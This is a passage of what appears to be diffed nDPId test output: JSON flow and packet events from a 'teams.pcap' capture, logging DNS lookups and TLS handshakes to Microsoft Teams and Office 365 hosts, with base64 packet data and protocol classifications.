{"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"7120d65624bcd2e02ed4b01388d84cdb","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01086{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1345,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1587041682809,"flow_last_seen":1587041682917,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":669,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1587041682917,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60546,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"7120d65624bcd2e02ed4b01388d84cdb","ja3s":"410b9bedaf65dd26c6fe547154d60db4","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1443,"source":"teams.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041683142,"flow_last_seen":1587041683142,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1587041683142,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57504,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1443,"source":"teams.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1587041683142,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1587041683142,"pkt":"EBMx8Tl2KDc3AG3ICABFAABOVgkAAP8R4j3AqAEGwKgBAeCgADUAOmwyTTEBAAABAAAAAAAACmNoYXRzdmNhZ2cEc3ZjcwV0ZWFtcwZvZmZpY2UDY29tAAABAAE="} -00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1443,"source":"teams.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041683142,"flow_last_seen":1587041683142,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1587041683142,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57504,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"chatsvcagg.svcs.teams.office.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1443,"source":"teams.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041683142,"flow_last_seen":1587041683142,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1587041683142,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57504,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"chatsvcagg.svcs.teams.office.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00676{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1452,"source":"teams.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1587041683184,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":1587041683184,"pkt":"KDc3AG3IEBMx8Tl2CABFAADQTcNAADkRcALAqAEBwKgBBgA14KAAvAAATTGBgAABAAMAAAAACmNoYXRzdmNhZ2cEc3ZjcwV0ZWFtcwZvZmZpY2UDY29tAAABAAHADAAFAAEAAAAMACoVdGVhbXMtY2hhdHN2Y2FnZy1wcm9kDnRyYWZmaWNtYW5hZ2VyA25ldADAPgAFAAEAAAEsADAWbXNnLXVrc28tMDEtY2hhdHN2Y2FnZwd1a3NvdXRoCGNsb3VkYXBwBWF6dXJlwCnAdAABAAEAAAAFAAQ0clg7"} 
-00804{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1452,"source":"teams.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041683142,"flow_last_seen":1587041683184,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":230,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1587041683184,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57504,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"chatsvcagg.svcs.teams.office.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.88.59"}} +00804{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1452,"source":"teams.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041683142,"flow_last_seen":1587041683184,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":230,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1587041683184,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57504,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"chatsvcagg.svcs.teams.office.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.88.59"}} 
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1453,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041683186,"flow_last_seen":1587041683186,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041683186,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.88.59","src_port":60547,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1453,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1587041683186,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041683186,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG7FzAqAEGNHJYO+yDAbslAEUuAAAAALAC\/\/+uKgAAAgQFtAEDAwUBAQgKMISxhQAAAAAEAgAA"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1454,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1587041683220,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041683220,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8HR9AAG0GokE0clg7wKgBBgG77INQlxoFJQBFL6ASIAAufwAAAgQFoAEDAwgEAggKAdQEQDCEsYU="} 
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1455,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1587041683220,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041683220,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG7GjAqAEGNHJYO+yDAbslAEUvUJcaBoAQEAltDgAAAQEICjCEsaYB1ARA"} -00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1456,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041683186,"flow_last_seen":1587041683220,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":221,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1587041683220,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.88.59","src_port":60547,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"chatsvcagg.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1456,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041683186,"flow_last_seen":1587041683220,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":221,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1587041683220,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.88.59","src_port":60547,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"chatsvcagg.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1492,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041683333,"flow_last_seen":1587041683333,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041683333,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60548,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1492,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1587041683333,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041683333,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIeyEAbsX4foHAAAAALAC\/\/8Q\/AAAAgQFtAEDAwUBAQgKMISyEgAAAAAEAgAA"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1493,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1587041683378,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041683378,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8VAJAAGwGd3g0ck0hwKgBBgG77IQbiSB\/F+H6CKASIABpjQAAAgQFoAEDAwgEAggKYR77TDCEshI="} 
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1494,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1587041683379,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041683379,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIeyEAbsX4foIG4kggIAQEAmoEAAAAQEICjCEsj9hHvtM"} -00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1495,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041683333,"flow_last_seen":1587041683379,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041683379,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60548,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1495,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041683333,"flow_last_seen":1587041683379,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041683379,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60548,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00185{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":1499,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041683406} 00358{"packet_event_id":1,"packet_event_name":"packet","packet_id":1499,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041683396,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 
-01502{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1503,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1587041683333,"flow_last_seen":1587041683431,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4409,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1587041683431,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60548,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} 
-00876{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1516,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041683186,"flow_last_seen":1587041683511,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10374,"flow_avg_l4_payload_len":324,"midstream":0,"thread_ts_msec":1587041683511,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.88.59","src_port":60547,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"chatsvcagg.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01502{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1503,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1587041683333,"flow_last_seen":1587041683431,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4409,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1587041683431,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60548,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} +00876{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1516,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041683186,"flow_last_seen":1587041683511,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10374,"flow_avg_l4_payload_len":324,"midstream":0,"thread_ts_msec":1587041683511,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.88.59","src_port":60547,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"chatsvcagg.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":1533,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041683611} 
00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":1533,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041683605,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1685,"source":"teams.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041684291,"flow_last_seen":1587041684291,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1587041684291,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":59403,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1685,"source":"teams.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1587041684291,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"thread_ts_msec":1587041684291,"pkt":"EBMx8Tl2KDc3AG3ICABFAABC19sAAP8RYHfAqAEGwKgBAegLADUALnZLN+4BAAABAAAAAAAACXN1YnN0cmF0ZQZvZmZpY2UDY29tAAABAAE="} -00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1685,"source":"teams.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041684291,"flow_last_seen":1587041684291,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1587041684291,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":59403,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"substrate.office.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1685,"source":"teams.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041684291,"flow_last_seen":1587041684291,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1587041684291,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":59403,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"substrate.office.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1686,"source":"teams.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1587041684304,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1587041684304,"pkt":"KDc3AG3IEBMx8Tl2CABFAADIzNlAADkR8PPAqAEBwKgBBgA16AsAtAAAN+6BgAABAAUAAAAACXN1YnN0cmF0ZQZvZmZpY2UDY29tAAABAAHADAAFAAEAAABCABQJc3Vic3RyYXRlB21zLWFjZGPAFsAyAAUAAQAAABYACAVhZmQta8AWwFIABQABAAAAGQAoEm91dGxvb2stb2ZmaWNlLWNvbQZrLTAwMDIIay1tc2VkZ2UDbmV0AMBmAAUAAQAAAKAAAsB5wHkAAQABAAAAoQAEDWsSCw=="} 
-00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1686,"source":"teams.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041684291,"flow_last_seen":1587041684304,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1587041684304,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":59403,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"substrate.office.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"13.107.18.11"}} +00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1686,"source":"teams.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041684291,"flow_last_seen":1587041684304,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1587041684304,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":59403,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"substrate.office.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"13.107.18.11"}} 
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1687,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041684306,"flow_last_seen":1587041684306,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041684306,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"13.107.18.11","src_port":60549,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1687,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1587041684306,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041684306,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGWZTAqAEGDWsSC+yFAbvNnLiZAAAAALAC\/\/\/7GwAAAgQFtAEDAwUBAQgKMIS1wQAAAAAEAgAA"} 